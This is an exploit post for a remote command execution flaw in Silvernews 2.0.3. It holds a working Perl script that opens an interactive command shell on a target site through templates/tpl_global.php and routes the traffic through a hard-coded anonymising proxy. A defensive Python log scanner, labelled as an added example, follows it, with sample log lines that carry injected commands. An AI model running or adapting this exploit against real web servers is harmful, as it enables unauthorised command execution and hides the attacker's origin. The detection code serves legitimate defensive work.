
Silvernews 2.0.3 remote command execution exploit, proxy server support!



Exploit for the remote command execution vulnerability in Silvernews 2.0.3:
discovered by:
http://www.securityfocus.com/archive/1/407163/30/0/threaded

sploit:
--------



#!/usr/bin/perl

################TSL###########################################################
#
#
# SilverNews Exploit included Proxy Server Function
# THROAT SECURITY LABS
#
#  vuln:  http://www.target.com/templates/tpl_global.php?command=[command]
#
#
################TSL###########################################################

$l="\015\012";
$t=0;
my $sock;
my $target;
my $location;
my $command;
my $proxy;

#define your proxyserver:
$proxy = "200.186.217.122"; #brazil high anonymity proxy

use IO::Socket;

sub sploit()
{

 $sock = IO::Socket::INET->new(PeerAddr => $proxy, PeerPort => 80,
 Proto => "tcp") or die "No Connection to Your ProxyServer: $proxy at Port 
80\n";

 print $sock "GET $target/$location/templates/tpl_global.php?command=$command 
HTTP/1.1$l";

 print $sock "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)$l";
 print $sock "Connection: close$l";

while (<$sock>) {

    if (/^HTTP\/1\.[0-2] ([0-9]{3}) .+$/ and $1 ne "200"){
        print "Error! Got HTTP return code $1. Exciting!\n";
        exit 1;

    }

    print if $t==1;
    $t=1 if /^$l$/;

 }

}

if (@ARGV != 2)

{

 print "\n*** by lizard for [T]hroat [S]ecurity [L]abs\n";
 print "-------------------------------------------------------\n\n";
 print "* usage:\t $0 [target] [path] \n";
 print "* example:\t $0 www.target.com newssystem \n";
 print "----\n\n\n pia s. i love you forever ;)\n\n";

} else {

 $target     = $ARGV[0];
 $location   = $ARGV[1];

 print "sending exploit ... please wait\n";
 sleep(1);

while(1){

   print "[sploit\@$target:/$location\] ";
   $_=<STDIN>;
   chop;
   next if /^$/;
   s/ /%20/;
   #if ($command=="exit") {exit} else {sploit()};
   $command=$_;
   sploit();

   }

}

#EOF#
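
For defenders: the request the script above sends (a direct GET to templates/tpl_global.php carrying a command parameter) leaves a recognisable entry in web server access logs. The log scanner below is an added example, not part of the original post or of Silvernews; it assumes Combined Log Format, and the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')
VULN_SUFFIX = "/templates/tpl_global.php"  # path named in the post's "vuln:" line

def inspect(line):
    """Return a finding dict if the line is a request for tpl_global.php, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    # urlsplit copes with origin-form ("/path?q") and proxy-style absolute targets.
    parts = urlsplit(target)
    # Decode %xx, collapse duplicate slashes, ignore case before comparing the path.
    path = re.sub(r"/+", "/", unquote(parts.path)).lower()
    if not path.endswith(VULN_SUFFIX):
        return None
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    return {
        "ip": ip, "time": ts, "method": method, "status": int(status),
        # A direct hit on a template file deserves review; "command" is the known vector.
        "severity": "high" if "command" in params else "review",
        "command": params.get("command"),
    }

def scan(lines):
    """Run inspect() over an iterable of log lines and keep the findings."""
    return [f for f in map(inspect, lines) if f]

# Constructed sample lines (documentation addresses and hosts, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:12:00:01 +0000] "GET /newssystem/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:12:00:05 +0000] "GET /newssystem/templates/tpl_global.php?command=id HTTP/1.1" 200 87',
    '198.51.100.7 - - [01/Jan/2024:12:00:09 +0000] "GET http://www.example.com/newssystem//templates/tpl%5Fglobal.php?%63ommand=uname%20-a HTTP/1.1" 200 140',
    '203.0.113.5 - - [01/Jan/2024:12:03:44 +0000] "GET /newssystem/templates/tpl_global.php HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f"{f['severity']:6} {f['ip']:15} {f['status']} {f['time']} command={f['command']!r}")
```

A "high" finding with status 200 means the parameter reached the script and should be treated as a possible compromise; the User-Agent string the script sends is too common to serve as an indicator on its own.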